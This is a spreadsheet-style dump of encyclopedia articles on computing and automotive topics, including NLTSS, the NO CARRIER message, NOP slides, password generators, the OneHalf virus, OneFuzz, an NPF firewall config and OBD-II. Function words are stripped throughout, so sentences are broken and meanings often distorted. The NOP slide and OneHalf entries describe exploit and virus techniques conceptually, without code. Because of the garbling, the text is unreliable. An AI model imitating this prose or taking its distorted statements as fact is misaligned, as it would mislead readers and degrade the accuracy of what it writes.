etc.) stored session level record processing remote procedure call sort mechanism. notion "user" rather peripherally defined nltss. there "account server" kept track users using resources (e.g., requests create objects file processes required account capability). access control entirely managed capabilities (communicable authority tokens). file server process could make requests file server creation files (returning file capability), read write files presenting file capability), etc. example, reading file generally required three buffer tables, send request file server, receive reply file server, receive data file. these three requests generally submitted time message system, sometimes bundled requests. control bits could buffer tables awaken (unblock) process whenever buffer tables submitted marked "done". library call read file would typically block control reply received file server, though asynchronous would course block could check block later. differences user side invisible file server. process server nltss process server quite similar file server user processes could creation processes, starting stopping processes, reading writing process memory registers, notified process faults. process server ordinary user mode process simply trusted communicate driver, like file server trusted communicate disk driver. process server stored process state files provided file server regard appeared like user process file server. directory server example higher level server nltss directory server. this server's task essentially turn files (invisible user) directories could used store retrieve capabilities name. since capabilities simply data particularly difficult task, consisting mostly manipulating access permissions capabilities according conventions defined lincs protocol suite. place interesting regarding access permission named inheritance. (allowed), capabilities could fetched full access directory. turned (disallowed), permissions turned directory capability turn turned capability fetched returned requesting application. this mechanism allowed people store, example, read/write files directory, give users permission fetch read-only instances them. development bulk programming nltss done pascal extension developed alamos national laboratory known "model". model extended pascal include abstract data type (object) mechanism features. nltss saddled compatibility legacy. nltss followed development deployment livermore time sharing system (ltss) livermore computer center llnl (~1968–1988?). nltss development began time ltss ported cray-1 become cray time sharing system. stay backward compatible many scientific applications llnl, nltss forced emulate prior ltss operating system's system calls. this emulation implemented form compatibility library named "baselib". example, directory structure thus process structure nltss naturally directed graph (process capabilities could stored directories like file capabilities directory capabilities), baselib library emulated simple linear (controller controllee) process structure (not even tree structure unix) stay compatible prior ltss. since scientific users never accessed nltss services outside baselib library, nltss ended looking nearly exactly like ltss users. most users aware capabilities, realize could access resources across network, generally aware nltss offered services beyond ltss. nltss support shared memory symmetric multiprocessing, development paralleled similar development cray time sharing system. even name nltss something legacy. "new livermore time sharing system" name initially considered temporary name development. once system began applications dual system mode (sort virtual machine sharing drivers ltss) permanent name, lincs network operating system (linos), chosen developers. unfortunately, management llnl decided name changed point (seemingly prior term used budget requests) temporary development nltss name stayed system throughout lifetime. mass storage system also developed parallel nltss used lincs protocols (same file directory protocols nltss). this system/software later commercialized unitree product. unitree generally superseded high performance storage system (hpss) could loosely considered legacy lincs nltss. example, lincs nltss introduced form third party transfer copy file file nltss process could send requests file servers, read write direct file servers transfer data themselves) carried modified form unitree hpss. implementation design issues biggest knock nltss production lifetime performance. performance issue affected users file access latency. this generally significant problem disk input/output (i/o), systems nltss also supported significant complement latency solid state disks access times microseconds. initial latencies file operations nltss comparable latency solid state disk access significantly higher ltss latency access. improve file access latency nltss implementation changed significantly latency sensitive processes particular file server) kernel". this effort significant might first sound nltss servers worked multithreading model. what change really amounted move threads responsible file server services separate file server process kernel "process". communication users unchanged (still buffer tables, lincs tokens, etc.), file operations avoided significant context changes primary cause higher latencies older ltss competing cray time sharing system provided. this change significantly (~3x) improve latency file operations, also meant file server became trusted part kernel implementation, design). second implementation issue nltss related security/integrity capability data implementation. this implementation used password capability model (e.g., control password). with model person process could access memory space process would authority access capability represented data found memory. some system architects (e.g., andrew tanenbaum, architect amoeba distributed operating system) suggested property access memory implying access capabilities inherent problem. environment nltss, sometimes happened people took program memory dumps others analysis. because concerns, password capabilities considered vulnerability nltss. design done protect vulnerability, control public encryption mechanism. this mechanism production nltss significant performance cost users aware vulnerability password capabilities. modern advances cryptography would make protection capabilities practical, especially internet/web capabilities (e.g., yurls wideword).a design issue nltss considered years removed production open network architecture. nltss processes considered virtual processors network firewalls restrictions. process could communicate freely other. this meant possible confinement even sense limiting direct communication, e.g., limiting covert channels "wall banging". correct problem nltss would require capabilities enable communication. late development work nltss "stream numbers" getting close facility, time active development stopped 1988, communication nltss still unconfined. also livermore time sharing system references further reading donnelley, components network operating system, fourth conference local networks, minneapolis, 1979. also computer networks (1979) 389–399. donnelley, managing domains network operating system, proceedings local networks distributed office systems conference, london, 1981, 345–361. brugger, gandhi, streletz, network livermore time sharing system (nltss), 2001 external links capability computing llnl discussion history capabilities computing llnl, including brief mention rats system development lead nltss stories development large scale scientific computing lawrence livermore national laboratory nltss chronicles cartoons development nltss lincs</t>
  </si>
  <si>
    <t>NO CARRIER</t>
  </si>
  <si>
    <t>carrier (capitalized) text message transmitted modem attached device (typically computer), indicating modem longer) connected remote system. carrier response message defined hayes command set. popularity hayes modems heyday dial-up connectivity, modem manufacturers supported hayes command set. reason, carrier message ubiquitously understood mean longer connected remote system. carrier tone carrier tone audio carrier signal used modems suppress echo cancellation establish baseline frequency communication. when answering modem detects ringtone phone line, picks line starts transmitting carrier tone. receive data calling modem within amount time, disconnects line. calling modem waits tone dials phone line initiates data transmission. receive carrier tone within amount time, disconnect phone line issues carrier message. actual data transmitted answering modem calling modem modulation carrier. practical meaning carrier message issued modem following reasons: dial (atd) answer (ata) command result successful connection another modem, reason line busy separately defined message). dial answer command aborted progress. abort triggered computer receiving keypress abort computer dropping data terminal ready (dtr) signal hang previously established data connection ended (either attached computer's command, result disconnected remote end), modem gone data mode command mode. current modems progressed pack bits second telephone line, specific implementation involves modulating audio-frequency carrier (particularly digital modems connect isdn cellular networks), message carrier remains consistent sake compatibility. linux's network stack uses carrier status network interface turned ("up") cannot connected physical layer operating properly, e.g. ethernet cable plugged internet slang carrier message used sentence humorous purposes internet messages forum posts, signifying person typing message suddenly off. this joke mean typist writing something excessively boring illogical, something authorities (usually either government site moderators) would supposedly want suppress. alternatively, imply simply victim luck. carrier message usually preceded string garbage characters, parody used frequently happen users dialup bbses whose telephones suddenly dropped signal middle message. (hey! wait! don't pick ph{#`%${%&amp;`+'${`%&amp;no carrier) this joke anachronistically continues seen internet despite waning modems favor broadband connectivity. also hayes command modem</t>
  </si>
  <si>
    <t>NOP slide</t>
  </si>
  <si>
    <t>computer security, slide, sled ramp sequence (no-operation) instructions meant "slide" cpu's instruction execution flow final, desired destination whenever program branches memory address anywhere slide. technique sees common usage software exploits, used direct program execution branch instruction target known precisely. other notable applications include defensive programming strategies emc-aware programming. while slide function consists list canonical instructions, presence code suspicious easy automatically detect. reason, practical slides often composed non-canonical instructions (such moving register adding zero), instructions affect program state inconsequentially, makes much difficult identify. nop-sled oldest widely known technique exploiting stack buffer overflows. solves problem finding exact address buffer effectively increasing size target area. this, much larger sections stack corrupted no-op machine instruction. attacker-supplied data, no-op instructions, attacker places instruction perform relative jump buffer shellcode located. this collection no-ops referred "nop-sled" return address overwritten address within no-op region buffer, execution "slide" no-ops redirected actual malicious code jump end. this technique requires attacker guess stack nop-sled instead comparatively small shellcode.because popularity technique, many vendors intrusion prevention systems search pattern no-op machine instructions attempt detect shellcode use. important note nop-sled necessarily contain traditional no-op machine instructions; instruction corrupt machine state point shellcode used place hardware assisted no-op. result, become common practice exploit writers compose no-op sled randomly chosen instructions real effect shellcode execution.while method greatly improves chances attack successful, without problems. exploits using technique still must rely amount luck guess offsets stack within nop-sled region. incorrect guess usually result target program crashing could alert system administrator attacker's activities. another problem nop-sled requires much larger amount memory hold nop-sled large enough use. this problem allocated size affected buffer small current depth stack shallow (i.e., much space current stack frame start stack). despite problems, nop-sled often method work given platform, environment, situation, still important technique. entropy slide dependent upon constraints placed determined certain registers (that say, known value next use), instructions manipulate arbitrarily used slide. additionally, alignment slide instruction pointer deterministic, multi-byte instructions used slide without regard results unaligned execution. input providing attack vector slide payload introduced filtered (such accepting printable characters), field possible instructions inclusion limited. while instructions part architecture extension (such sse) frequently irrelevant program state, cannot used slide targeting computer extension supported. detection many techniques exist detect presence slides memory. example, 2005, greek researchers found easily detected checking whether memory image contains lengthy sequence bytes starting offset within sequence valid leads execution place. also heap spraying, technique complementary slides buffer overflow sled technique immunity-aware programming slide worm memory test references external links slide compromise system neville, alan (2010-03-20). "ids logs forensics investigations: analysis compromised honeypot" (pdf). archived original (pdf) 2012-03-31. retrieved 2011-09-03.</t>
  </si>
  <si>
    <t>Random password generator</t>
  </si>
  <si>
    <t>random password generator software program hardware device takes input random pseudo-random number generator automatically generates password. random passwords generated manually, using simple sources randomness dice coins, generated using computer. while many examples "random" password generator programs available internet, generating randomness tricky many programs generate random characters ensures strong security. common recommendation open source security tools possible since allow independent checks quality methods used. note simply generating password random ensure password strong password, possible, although highly unlikely, generate easily guessed cracked password. fact, need password produced perfectly random process: needs sufficiently difficult guess. password generator part password manager. when password policy enforces complex rules, easier password generator based rules manually create passwords. long strings random characters difficult people memorize. mnemonic hashes, reversibly convert random strings memorable passwords, substantially improve ease memorization. hash processed computer recover original 60-bit string, least much information content original string. similar techniques used memory sport. naive approach here code samples programmer familiar limitations random number generators standard programming libraries might implement: case, standard function rand, pseudo-random number generator, initially seeded using functions time, later iterations rand instead. according ansi standard, time returns value type time_t, implementation-defined, commonly 32-bit integer containing current number seconds since january 1970 (see: unix time). there million seconds year, attacker knows year simple matter situations frequent password changes mandated password policy) process password generated with, faces relatively small number, cryptographic standards, choices test. attacker knows accurately password generated, faces even smaller number candidates test serious flaw implementation. situations attacker obtain encrypted version password, testing performed rapidly enough million trial passwords checked matter seconds. see: password cracking. function rand presents another problem. pseudo-random number generators internal memory state. size state determines maximum number different values produce: n-bit state produce {\displaystyle 2^{n}} different values. many systems rand 32-bit state, already significant security limitation. microsoft documentation describe internal state visual implementation standard library rand, 32767 possible outputs bits) call. microsoft recommends different, secure function, rand_s, used instead. output rand_s cryptographically secure, according microsoft, seed loaded srand function. however programming interface differs rand. second case, function microtime used, returns current unix timestamp microseconds. this increases number possibilities, someone good guess password generated, example, date employee started work, still reasonably small search space. also, operating systems provide time microsecond resolution, sharply reducing number choices. finally, rand function usually uses underlying rand function, small state space, depending implemented. alternative random number generator, mt_rand, based mersenne twister pseudorandom number generator, available php, also 32-bit state. there proposals adding strong random number generation php. stronger methods variety methods exist generating strong, cryptographically secure random passwords. unix platforms /dev/random /dev/urandom commonly used, either programmatically conjunction program makepasswd. windows programmers cryptographic application programming interface function cryptgenrandom. java programming language includes class called securerandom. another possibility derive randomness measuring external phenomenon, timing user keyboard input. many computer systems already application (typically named "apg") implement fips 181. fips 181—automated password generator—describes standard process converting random bits (from hardware random number generator) somewhat pronounceable "words" suitable passphrase. however, 1994 attack fips algorithm discovered, attacker expect, average, break accounts passwords based algorithm, searching million passwords. this non-uniformity distribution passwords generated, addressed using longer passwords modifying algorithm. bash here code sample uses /dev/urandom generate password simple bash function. this function takes password length parameter, uses default: java here code sample (adapted class passwordgenerator) uses securerandom generate hexadecimal character password: javascript this example uses node.js crypto module generate cryptographically secure random numbers uniform distribution. perl this example uses crypt::random::source module find source strong random numbers (which platform dependent). python language python includes systemrandom class obtains cryptographic grade random bits /dev/urandom unix-like system, including linux macos, windows uses cryptgenrandom. here simple python script demonstrates class: program open read /dev/urandom, available, invoke microsoft utilities. third option, openssl available employ function openssl_random_pseudo_bytes'.' mechanical methods another method physical devices dice generate randomness. simple uses table characters. first roll selects table second column. example, roll followed roll would select letter fractionation table below. generate upper/lower case characters symbols coin flip used, heads capital, tails lower case. digit selected dice rolls, heads coin flip might select symbol standard keyboard, instead '4'. type strength password generated random password generators normally output string symbols specified length. these individual characters character set, syllables designed form pronounceable passwords, words word list form passphrase. program customized ensure resulting password complies local password policy, always producing letters, numbers special characters. such policies typically reduce strength slightly formula follows, symbols longer independently produced. password strength random password particular attack (brute-force search), calculated computing information entropy random process produced symbol password produced independently uniform probability, entropy bits given formula {\displaystyle h=l\,\log _{2}n=l{\log \over \log number possible symbols number symbols password. function log2 base-2 logarithm. typically measured bits. password generator limited state space pseudo-random number generator used based one. thus password generated using 32-bit generator limited bits entropy, regardless number characters password contains. note, however, different type attack might succeed password evaluated 'very strong' calculation. password generator programs websites large number password generator programs websites available internet. their quality varies hard assess clear description source randomness used source code provided allow claims checked. furthermore, probably importantly, transmitting candidate passwords internet raises obvious security concerns, particularly connection password generation site's program properly secured site compromised way. without secure channel, possible prevent eavesdropping, especially public networks internet. possible solution issue generate password using client-side programming language javascript. advantage approach generated password stays client computer transmitted external server. also cryptographically secure pseudorandom number generator diceware hardware random number generator size password length parameter password manager references external links cryptographically secure random number windows without using cryptoapi msdn 4086 randomness recommendations security (replaces earlier 1750.)</t>
  </si>
  <si>
    <t>OneHalf</t>
  </si>
  <si>
    <t>onehalf dos-based polymorphic computer virus (hybrid boot file infector) discovered october 1994. also known slovak bomber, freelove explosion-ii. infects master boot record (mbr) hard disk, files extensions .com, .scr .exe. however, infect files scan, clean, findviru, guard, nod, vsafe, msav chkdsk name.it also known first viruses implement technique "patchy infection", introduced bomber. onehalf different variants, functionally similar behaviour. payload onehalf known peculiar payload: every boot, encrypts unencrypted cylinders user's hard disk, temporarily decrypts accessed. this makes sure user notice hard disk encrypted like this, lets encryption continue further. also hides real programs computer, make detection harder. encryption done bitwise xoring randomly generated key, decrypted simply xoring stream again. once virus encrypted half disk, and/or 4th, 8th, 10th, 14th, 18th, 20th, 24th, 28th 30th month conditions, virus display message: half. press continue removal onehalf's unique payload makes removal harder: simply removing virus cleaning leave data encrypted, requiring backups restore such, special tools needed decrypt hard disk removing virus. tool developed (slovak antivirus center) job. references external links one_half: lieutenant commander</t>
  </si>
  <si>
    <t>OneFuzz</t>
  </si>
  <si>
    <t>onefuzz cross-platform free open source fuzz testing framework microsoft. software enables continuous developer-driven fuzz testing identify weaknesses computer software prior release. overview onefuzz self-hosted fuzzing-as-a-service platform automates detection software bugs could security issues. supports windows linux.notable features include composable fuzzing workflows, built-in ensemble fuzzing, programmatic triage result de-duplication, crash reporting notification callbacks, on-demand live-debugging found crashes. command-line interface client written python targets python up.microsoft uses onefuzz testing framework probe edge, windows products company. replaced previous microsoft security risk detection software testing mechanism.the source code released september 2020. licensed license hosted github. also test automation random testing american fuzzy (fuzzer) dynamorio (computer program) references external links official website onefuzz github microsoft announces project onefuzz framework, open source developer tool find bugs scale</t>
  </si>
  <si>
    <t>NPF (firewall)</t>
  </si>
  <si>
    <t>licensed stateful packet filter, central piece software firewalling. comparable iptables, ipfw, ipfilter developed netbsd. history primarily written mindaugas rasiukevicius. first appeared netbsd release 2012. features designed high performance systems easy extensibility. supports various forms network address translation (nat), stateful packet inspection, tree hash tables sets, bytecode (bpf n-code) custom filter rules features. extension framework supporting custom modules. features packet logging, traffic normalization, random blocking provided extensions. example npf.conf assigning ipv4-only addresses specified interfaces. $ext_if inet4(wm0) $int_if inet4(wm1) efficient tables store sets. table type hash file "/etc/npf_blacklist" table type tree dynamic variables service names. $services_tcp http, https, smtp, domain, 9022 $services_udp domain, $localnet 10.1.1.0/24 different forms supported. $ext_if dynamic 10.1.1.0/24 $ext_if $ext_if dynamic 10.1.1.2 port $ext_if port 9022 various extensions supported custom procedures. procedure "log" log: npflog0 grouping mandatory npf. there must default group. group "external" $ext_if stateful passing outgoing traffic. pass stateful final block final pass stateful final family inet proto $ext_if port apply "log" pass stateful final proto $ext_if port $services_tcp pass stateful final proto $ext_if port $services_udp passive traceroute pass stateful final proto $ext_if port 49151-65535 pass stateful final proto $ext_if port 33434-33600 group "internal" $int_if ingress filtering 2827. block pass final $localnet pass final pass final group default pass final block references external links official website npf.conf(5) netbsd file formats manual</t>
  </si>
  <si>
    <t>Residual bit error rate</t>
  </si>
  <si>
    <t>residual error rate (rber) receive quality metric digital transmission, several used quantify accuracy received data. overview digital transmission schemes, including cellular telephony systems gsm, certain percentage received data detected containing errors, discarded. likelihood particular detected erroneous error rate. rber characterizes likelihood given erroneous detected applications when digital communication systems designed, maximum acceptable residual error rate used, along quality metrics, calculate minimum acceptable signal-to-noise ratio system. this turn provides minimum requirements physical electronic design transmitter receiver. references</t>
  </si>
  <si>
    <t>NProtect GameGuard Personal 2007</t>
  </si>
  <si>
    <t>nprotect gameguard personal 2007 (often referred nprotect ggp2007) anti-virus security suite microsoft windows 2000, vista developed inca internet users playing online computer games. includes real-time protection forms malware, including viruses, trojans, spyware, worms, keyloggers, rootkits, well game optimization feature. like many security products, nprotect gameguard personal 2007 cause collisions executed security products simultaneously. collisions mainly occur running on-access scanning (real-time scanning) simultaneously. nprotect gameguard personal 2007 available free non-free edition, former lacking treatment abilities malware. also inca internet co., ltd. nprotect gameguard anti-virus software references external links nprotect gameguard official website</t>
  </si>
  <si>
    <t>On-board diagnostics</t>
  </si>
  <si>
    <t>on-board diagnostics (obd) term referring vehicle's self-diagnostic reporting capability. systems give vehicle owner repair technician access status various vehicle sub-systems. amount diagnostic information available varied widely since introduction early 1980s versions on-board vehicle computers. early versions would simply illuminate malfunction indicator light "idiot light" problem detected would provide information nature problem. modern implementations standardized digital communications port provide real-time data addition standardized series diagnostic trouble codes, dtcs, allow person rapidly identify remedy malfunctions within vehicle. history 1968: volkswagen introduces first on-board computer system, fuel-injected type models. this system entirely analog diagnostic capabilities. 1975: bosch bendix systems adopted major automotive manufacturers effort improve tail pipe emissions. these systems also analog nature, though provide rudimentary diagnostic capability factory tools, kent moore j-25400, compatible datsun 280z, cadillac seville. 1980: general motors introduces first digital system 1980 eldorado seville models. proprietary 5-pin aldl interfaces engine control module (ecm) initiate diagnostic request provide serial data stream. protocol communicates baud pulse-width modulation (pwm) signaling monitors engine management functions. real-time sensor data, component overrides, diagnostic trouble codes (dtc's) also displayed electronic climate control system's digital readout diagnostic mode. 1982: defines analog ste/ice vehicle diagnostic standard used cucv, tank military vehicles army. 1986: upgraded version aldl protocol appears communicates 8192 baud half-duplex uart signaling. this protocol defined xde-5024b. 1988: california resources board (carb) requires vehicles sold california 1988 newer vehicles basic capability. these requirements generally referred "obd-i", though name applied introduction obd-ii. data link connector position standardized, data protocol. society automotive engineers (sae) recommends standardized diagnostic connector diagnostic test signals. ~1994: motivated desire state-wide emissions testing program, carb issues obd-ii specification mandates adopted cars sold california starting model year 1996 (see title section 1968.1 part section 86.094). dtcs connector suggested incorporated specification. 1996: obd-ii specification made mandatory cars sold united states. 2001: european union makes eobd mandatory gasoline (petrol) vehicles sold european union, starting my2001 (see european emission standards directive 98/69/ec). 2004: european union makes eobd mandatory diesel vehicles sold european union 2006: vehicles manufactured australia zealand required obd-ii compliant january 2006. 2008: cars sold united states required 15765-4 signaling standard variant controller area network (can) bus). 2008: certain light vehicles china required environmental protection administration office implement (standard gb18352) july 2008. some regional exemptions apply. 2010: hdobd (heavy duty) specification made mandatory selected commercial (non-passenger car) engines sold united states. standard interfaces aldl gm's aldl (assembly line diagnostic link) sometimes referred predecessor manufacturer's proprietary version obd-i diagnostic. this interface made different varieties changed power train control modules (aka pcm, ecm, ecu). different versions slight differences pin-outs baud rates. earlier versions used baud rate, later versions went 8192 baud used bi-directional communications pcm. obd-i regulatory intent obd-i encourage auto manufacturers design reliable emission control systems remain effective vehicle's "useful life". hope forcing annual emissions testing california, denying registration vehicles pass, drivers would tend purchase vehicles would reliably pass test. obd-i largely unsuccessful, means reporting emissions-specific diagnostic information standardized. technical difficulties obtaining standardized reliable emissions information vehicles inability implement annual testing program effectively.the diagnostic trouble codes (dtc's) obd-i vehicles usually found without expensive scan tool. each manufacturer used diagnostic link connector (dlc), location, definitions, procedure read dtc's vehicle. dtc's obd-i cars often read blinking patterns 'check engine light' (cel) 'service engine soon' (ses) light. connecting certain pins diagnostic connector, 'check engine' light blink two-digit number corresponds specific error condition. dtc's obd-i cars interpreted different ways, however. cadillac (gasoline) fuel-injected vehicles equipped actual on-board diagnostics, providing trouble codes, actuator tests sensor data digital electronic climate control display. holding 'off' 'warmer' several seconds activates diagnostic mode without need external scan tool. some honda engine computers equipped leds light specific pattern indicate dtc. general motors, 1989-1995 ford vehicles (dcl), 1989-1995 toyota/lexus vehicles live sensor data stream available; however, many obd-i equipped vehicles not. obd-i vehicles fewer dtc's available obd-ii equipped vehicles. obd-1.5 refers partial implementation obd-ii general motors used vehicles 1994, 1995, 1996. term documentation vehicles simply obd-ii section service manual.) example, 94–95 corvettes post-catalyst oxygen sensor (although catalytic converters), subset obd-ii codes implemented.this hybrid system present h-body cars 94–95, w-body cars (buick regal, chevrolet lumina ('95 only), chevrolet monte carlo ('95 only), pontiac grand prix, oldsmobile cutlass supreme) 94–95, l-body (chevrolet beretta/corsica) 94–95, y-body (chevrolet corvette) 94–95, f-body (chevrolet camaro pontiac firebird) j-body (chevrolet cavalier pontiac sunfire) n-body (buick skylark, oldsmobile achieva, pontiac grand also '94-'95 saab vehicles naturally aspirated 2.3. pinout aldl connection cars follows: aldl connections, data stream, pins ground, battery voltage. compatible scan tool required read codes generated 1.5. additional vehicle-specific diagnostic control circuits also available connector. instance, corvette interfaces class serial data stream pcm, diagnostic terminal, radio data stream, airbag system, selective ride control system, tire pressure warning system, passive keyless entry system.an also used ford scorpio since obd-ii obd-ii improvement obd-i capability standardization. obd-ii standard specifies type diagnostic connector pinout, electrical signalling protocols available, messaging format. also provides candidate list vehicle parameters monitor along encode data each. there connector provides power scan tool vehicle battery, eliminates need connect scan tool power source separately. however, technicians might still connect scan tool auxiliary power source protect data unusual event vehicle experiences loss electrical power malfunction. finally, obd-ii standard provides extensible list dtcs. result standardization, single device query on-board computer(s) vehicle. this obd-ii came models obd-iia obd-iib. obd-ii standardization prompted emissions requirements, though emission-related codes data required transmitted manufacturers made obd-ii data link connector vehicle systems diagnosed programmed. obd-ii diagnostic trouble codes 4-digit, preceded letter: powertrain (engine transmission), body, chassis, network. obd-ii diagnostic connector obd-ii specification provides standardized hardware interface female 16-pin (2x8) j1962 connector, type used volt vehicles type volt vehicles. unlike obd-i connector, sometimes found hood vehicle, obd-ii connector required within feet (0.61 steering wheel (unless exemption applied manufacturer, case still somewhere within reach driver). j1962 defines pinout connector assignment unspecified pins left vehicle manufacturer's discretion. eobd european on-board diagnostics (eobd) regulations european equivalent obd-ii, apply passenger cars category (with passenger seats gross vehicle weight rating 2500 less) first registered within member states since january 2001 petrol (gasoline) engined cars since january 2004 diesel engined cars.for newly introduced models, regulation dates applied year earlier january 2000 petrol january 2003 diesel. passenger cars gross vehicle weight rating greater 2500 light commercial vehicles, regulation dates applied january 2002 petrol models, january 2007 diesel models. technical implementation eobd essentially obd-ii, j1962 diagnostic link connector signal protocols used. with euro euro emission standards, eobd emission thresholds lower previous euro eobd fault codes each eobd fault codes consists five characters: letter, followed four numbers. letter refers system interrogated e.g. pxxxx would refer powertrain system. next character would complies eobd standard. look like p0xxx. next character would refer system. p00xx fuel metering auxiliary emission controls. p01xx fuel metering. p02xx fuel metering (injector circuit). p03xx ignition system misfire. p04xx auxiliary emissions controls. p05xx vehicle speed controls idle control system. p06xx computer output circuit. p07xx transmission. p08xx transmission.the following characters would refer individual fault within subsystem. eobd2 term "eobd2" marketing speak used vehicle manufacturers refer manufacturer-specific features actually part eobd standard. case stands enhanced. jobd jobd version obd-ii vehicles sold japan. 79/01 79/02 (australian standard) 79/01 (vehicle standard (australian design rule 79/01 emission control light vehicles) 2005) standard australian equivalent obd-ii. applies vehicles category gross vehicle weight rating 3500 less, registered within australia produced since january 2006 petrol (gasoline) engined cars since january 2007 diesel engined cars. newly introduced models, regulation dates applied year earlier january 2005 petrol january 2006 diesel. 79/01 standard supplemented 79/02 standard imposed tighter emissions restrictions, applicable vehicles class gross vehicle weight rating 3500 less, july 2008 models, july 2010 models.the technical implementation standard essentially obd-ii, j1962 diagnostic link connector signal protocols used. obd-ii signal protocols there five signaling protocols permitted obd-ii interface. most vehicles implement protocols. often possible deduce protocol used based pins present j1962 connector: j1850 (pulse-width modulation 41.6 kb/sec, standard ford motor company) bus+ bus– high voltage message length restricted bytes, including employs multi-master arbitration scheme called 'carrier sense multiple access non-destructive arbitration' (csma/nda) j1850 (variable pulse width 10.4/41.6 kb/sec, standard general motors) bus+ idles high voltage decision point +3.5 message length restricted bytes, including employs csma/nda 9141-2. this protocol asynchronous serial data rate 10.4 kbps. somewhat similar rs-232; however, signal levels different, communications happen single, bidirectional line without additional handshake signals. 9141-2 primarily used chrysler, european, asian vehicles. k-line l-line (optional) uart signaling k-line idles high, resistor vbatt active/dominant state driven open-collector driver. message length 260bytes. data field 255. 14230 kwp2000 (keyword protocol 2000) k-line l-line (optional) physical layer identical 9141-2 data rate 10.4 kbaud message contain bytes data field 15765 (250 kbit/s kbit/s). protocol developed bosch automotive industrial control. unlike protocols, variants widely used outside automotive industry. while meet obd-ii requirements u.s. vehicles prior 2003, 2008 vehicles sold required implement signaling protocols. high lowall obd-ii pinouts connector, different pins used exception (battery ground) (battery positive). obd-ii diagnostic data available obd-ii provides access data engine control unit (ecu) offers valuable source information troubleshooting problems inside vehicle. j1979 standard defines method requesting various diagnostic data list standard parameters might available ecu. various parameters available addressed "parameter identification numbers" pids defined j1979. list basic pids, definitions, formula convert obd-ii output meaningful diagnostic units, obd-ii pids. manufacturers required implement pids listed j1979 allowed include proprietary pids listed. request data retrieval system gives access real time performance data well flagged dtcs. list generic obd-ii dtcs suggested sae, table obd-ii codes. individual manufacturers often enhance obd-ii code additional proprietary dtcs. mode operation/obd services here basic introduction communication protocol according 15031. j1979 "modes" renamed "services", starting 2003. service mode used identify powertrain information available scan tool. service mode displays freeze frame data. service mode lists emission-related "confirmed" diagnostic trouble codes stored. displays exact numeric, digit codes identifying faults. service mode used clear emission-related diagnostic information. this includes clearing stored pending/confirmed dtcs freeze frame data. service mode displays oxygen sensor monitor screen test results gathered oxygen sensor. there numbers available diagnostics: rich-to-lean sensor threshold voltage lean-to-rich sensor threshold voltage sensor voltage threshold switch time measurement high sensor voltage threshold switch time measurement rich-to-lean switch time lean-to rich switch time minimum voltage test maximum voltage test time voltage transitions service mode request on-board monitoring test results continuously non-continuously monitored system. there typically minimum value, maximum value, current value non-continuous monitor. service mode request emission-related diagnostic trouble codes detected current last completed driving cycle. enables external test equipment obtain "pending" diagnostic trouble codes detected current last completed driving cycle emission-related components/systems. this used service technicians vehicle repair, clearing diagnostic information test results single driving cycle determine repair fixed problem. service mode could enable off-board test device control operation on-board system, test, component. service mode used retrieve vehicle information. among others, following information available: (vehicle identification number): vehicle calid (calibration identification): software installed (calibration verification number): number used verify integrity vehicle software. manufacturer responsible determining method calculating cvn(s), e.g. using checksum. in-use performance counters gasoline engine catalyst, primary oxygen sensor, evaporating system, system, system, secondary system, secondary oxygen sensor diesel engine nmhc catalyst, reduction catalyst, absorber particulate matter filter, exhaust sensor, system, system, boost pressure control, fuel system. service mode lists emission-related "permanent" diagnostic trouble codes stored. carb, diagnostic trouble codes commanding stored non-volatile memory shall logged permanent fault code.see obd-ii pids extensive list information. applications various tools available plug connector access functions. these range simple generic consumer level tools highly sophisticated dealership tools vehicle telematic devices. hand-held scan tools range rugged hand-held scan tools available. simple fault code readers/reset tools mostly aimed consumer level. professional hand-held scan tools possess advanced functions access advanced diagnostics manufacturer- vehicle-specific parameters access control control units, real-time monitoring graphing engine parameters facilitate diagnosis tuning mobile device-based tools analysis mobile device applications allow mobile devices cell phones tablets display manipulate obd-ii data accessed adaptor cables bluetooth adapters plugged car's connector. newer devices market equipped sensors ability transmit vehicle location diagnostics data cellular network. modern obd-ii devices therefore nowadays used example locate vehicles, monitor driving behavior addition reading diagnostics trouble codes (dtc). even advanced devices allow users reset engine codes, effectively turning engine lights dashboard; however, resetting codes address underlying issues worst case scenarios even lead engine breakage source issue serious left unattended long periods time. obd2 software obd2 software package installed computer (windows, mac, linux) help diagnose onboard system, read erase dtcs, turn mil, show real-time data, measure vehicle fuel economy.to obd2 software, needs bluetooth wifi obd2 adapter plugged obd2 port enable vehicle connect computer software installed. pc-based scan tools analysis platforms pc-based analysis tool converts obd-ii signals serial data (usb serial port) standard macs. software decodes received data visual display. many popular interfaces based elm327 interpreter ics, read five generic obd-ii protocols. some adapters j2534 allowing access obd-ii protocols cars trucks. addition functions hand-held scan tool, pc-based tools generally offer: large storage capacity data logging functions higher resolution screen handheld tools ability multiple software programs adding flexibility identification clearance fault code data shown intuitive graphs chartsthe extent tool access manufacturer vehicle-specific diagnostics varies software products hand-held scanners. data loggers data loggers designed capture vehicle data vehicle normal operation, later analysis. data logging uses include: engine vehicle monitoring normal operation, purposes diagnosis tuning. some auto insurance companies offer reduced premiums obd-ii vehicle data loggers cameras installed driver's behaviour meets requirements. this form auto insurance risk selection monitoring driver behaviour fleet vehicle operators.analysis vehicle black data performed periodic basis, automatically transmitted wirelessly third party retrieved forensic analysis event accident, traffic infringement mechanical fault. emission testing united states, many states obd-ii testing instead tailpipe testing obd-ii compliant vehicles (1996 newer). since obd-ii stores trouble codes emissions equipment, testing computer query vehicle's onboard computer verify emission related trouble codes vehicle compliance emission standards model year manufactured. netherlands, 2006 later vehicles yearly eobd emission check. driver's supplementary vehicle instrumentation driver's supplementary vehicle instrumentation instrumentation installed vehicle addition provided vehicle manufacturer intended display driver normal operation. this opposed scanners used primarily active fault diagnosis, tuning, hidden data logging. auto enthusiasts traditionally installed additional gauges manifold vacuum, battery current etc. standard interface enabled generation enthusiast instrumentation accessing full range vehicle data used diagnostics, derived data instantaneous fuel economy. instrumentation take form dedicated trip computers, carputer interfaces pdas, smartphones, garmin navigation unit. carputer essentially software could loaded pc-based scan tools vice versa, distinction reason software. these enthusiast systems also include functionality similar scan tools. vehicle telematics information commonly used vehicle telematics devices perform fleet tracking, monitor fuel efficiency, prevent unsafe driving, well remote diagnostics pay-as-you-drive insurance. although originally intended purposes, commonly supported data vehicle speed, rpm, fuel level allow gps-based fleet tracking devices monitor vehicle idling times, speeding, over-revving. monitoring dtcs company know immediately vehicles engine problem interpreting code nature problem. used detect reckless driving real time based sensor data provided port. this detection done adding complex events processor (cep) backend client's interface. also monitored block mobile phones driving record trip data insurance purposes. obd-ii diagnostic trouble codes obd-ii diagnostic trouble codes (dtcs) contain letter numbers, divided following categories: body (includes conditioning airbag) (1164 codes) chassis (includes abs) (486 codes) powertrain (engine transmission) (1688 codes) network (wiring bus) (299 codes) 